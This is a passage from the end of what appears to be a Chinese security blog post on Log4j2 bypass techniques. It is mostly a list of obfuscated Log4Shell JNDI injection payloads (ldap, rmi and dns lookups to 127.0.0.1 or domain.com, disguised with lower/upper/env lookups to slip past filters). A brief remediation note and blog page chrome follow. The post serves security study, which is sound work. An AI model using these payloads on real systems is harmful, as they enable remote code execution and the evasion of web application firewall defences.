class="comment">//127.0.0.1:1234/ExportObject&#125;&quot;;</span></span><br><span class="line">  </span><br><span class="line">$&#123;$&#123;lower:$&#123;upper:jn&#125;&#125;di:ldap:<span class="comment">//127.0.0.1:1234/ExportObject&#125;&quot;;</span></span><br><span class="line">  </span><br><span class="line">$&#123;$&#123;lower:$&#123;upper:jn&#125;&#125;$&#123;::-di&#125;:ldap:<span class="comment">//127.0.0.1:1234/ExportObject&#125;&quot;;</span></span><br><span class="line">$&#123;jndi:ldap:<span class="comment">//domain.com/j&#125;</span></span><br><span class="line">$&#123;jndi:ldap:/domain.com/a&#125;</span><br><span class="line">$&#123;jndi:dns:/domain.com&#125;</span><br><span class="line">$&#123;jndi:dns:<span class="comment">//domain.com/j&#125;</span></span><br><span class="line">$&#123;$&#123;::-j&#125;$&#123;::-n&#125;$&#123;::-d&#125;$&#123;::-i&#125;:$&#123;::-r&#125;$&#123;::-m&#125;$&#123;::-i&#125;:<span class="comment">//domain.com/j&#125;</span></span><br><span class="line">$&#123;$&#123;::-j&#125;ndi:rmi:<span class="comment">//domain.com/j&#125;</span></span><br><span class="line">$&#123;jndi:rmi:<span class="comment">//domainldap.com/j&#125;</span></span><br><span class="line">$&#123;$&#123;lower:jndi&#125;:$&#123;lower:rmi&#125;:<span class="comment">//domain.com/j&#125;</span></span><br><span class="line">$&#123;$&#123;lower:$&#123;lower:jndi&#125;&#125;:$&#123;lower:rmi&#125;:<span class="comment">//domain.com/j&#125;</span></span><br><span class="line">$&#123;$&#123;lower:j&#125;$&#123;lower:n&#125;$&#123;lower:d&#125;i:$&#123;lower:rmi&#125;:<span class="comment">//domain.com/j&#125;</span></span><br><span class="line">$&#123;$&#123;lower:j&#125;$&#123;upper:n&#125;$&#123;lower:d&#125;$&#123;upper:i&#125;:$&#123;lower:r&#125;m$&#123;lower:i&#125;&#125;:<span class="comment">//domain.com/j&#125;</span></span><br><span class="line">$&#123;jndi:$&#123;lower:l&#125;$&#123;lower:d&#125;a$&#123;lower:p&#125;:<span class="comment">//domain.com&#125;</span></span><br><span class="line">$&#123;$&#123;env:NaN:-j&#125;ndi$&#123;env:NaN:-:&#125;$&#123;env:NaN:-l&#125;dap$&#123;env:NaN:-:&#125;<span class="comment">//domain.com/a&#125;</span></span><br><span class="line">jn$&#123;env::-&#125;di:</span><br><span class="line">jn$&#123;date:&#125;di$&#123;date:<span class="string">&#x27;:&#x27;</span>&#125;</span><br><span class="line">j$&#123;k8s:k5:-ND&#125;i$&#123;sd:k5:-:&#125;</span><br><span class="line">j$&#123;main:\k5:-Nd&#125;i$&#123;spring:k5:-:&#125;</span><br><span class="line">j$&#123;sys:k5:-nD&#125;$&#123;lower:i$&#123;web:k5:-:&#125;&#125;</span><br><span class="line">j$&#123;::-nD&#125;i$&#123;::-:&#125;</span><br><span class="line">j$&#123;EnV:K5:-nD&#125;i:</span><br><span class="line">j$&#123;loWer:Nd&#125;i$&#123;uPper::&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>





<h1 id="0x04-修复建议"><a href="#0x04-修复建议" class="headerlink" title="0x04 修复建议"></a>0x04 修复建议</h1><p>开组奇安信威胁情报中心</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306101943617.png" alt="1639383712467.png"></p>
<p>低版本(&lt;2.10)无法通过jvm 参数、配置、环境系统变量中设置 nolookups关闭 lookup 功能</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2023/05/28/CISCN_2023/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2023-06-10 19:46:36
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags" title="Tags"></i>
                    
                    <span class="span--tag">
                      <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="代码审计">
                        <b>#</b> 代码审计
                      </a>
                    </span>
                    
                    <span class="span--tag">
                      <a href="/tags/Java%E5%AE%89%E5%85%A8/" title="Java安全">
                        <b>#</b> Java安全
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87"><span class="toc-text">0x01环境准备</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%8B%E8%AF%95"><span class="toc-text">测试</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-text">0x02漏洞分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-Log4j2%E7%9A%84%E4%B8%80%E4%BA%9B%E7%82%B9"><span class="toc-text">0x03 Log4j2的一些点</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BC%93%E8%A7%A3%E6%8E%AA%E6%96%BD%E5%8F%8A%E8%AF%B4%E6%98%8E"><span class="toc-text">缓解措施及说明</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B6%88%E6%81%AF%E6%A0%BC%E5%BC%8F%E5%8C%96"><span class="toc-text">消息格式化</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-15-0-rc1-%E7%BB%95%E8%BF%87"><span class="toc-text">2.15.0(rc1)绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass"><span class="toc-text">Bypass</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-%E4%BF%AE%E5%A4%8D%E5%BB%BA%E8%AE%AE"><span class="toc-text">0x04 修复建议</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/ki10Moc/">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="email" href="ki10Moc1949@gmail.com">
            <i class="iconfont icon-envelope"></i>
          </a>
        </li>
      
        <li>
          <a title="facebook" target="_blank" rel="noopener" href="https://www.facebook.com/profile.php?id=100083345720708">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" target="_blank" rel="noopener" href="https://twitter.com/ki10moc1/status/1494844731544662019?s=21&t=l-0lygAzRMHeJeBklnPt-A">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/ki10Moc/">Copyright © 2023 ki10Moc</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/ki10Moc/">霍布斯鲍姆学徒 | CTFer</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + log4j2%E7%BB%95%E8%BF%87%E6%89%8B%E6%B3%95 + '&url=' + https%3A%2F%2Fki10moc.github.io%2F2023%2F06%2F10%2Flog4j2%25E7%25BB%2595%25E8%25BF%2587%25E6%2589%258B%25E6%25B3%2595%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://ki10moc.github.io/2023/06/10/log4j2%E7%BB%95%E8%BF%87%E6%89%8B%E6%B3%95/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
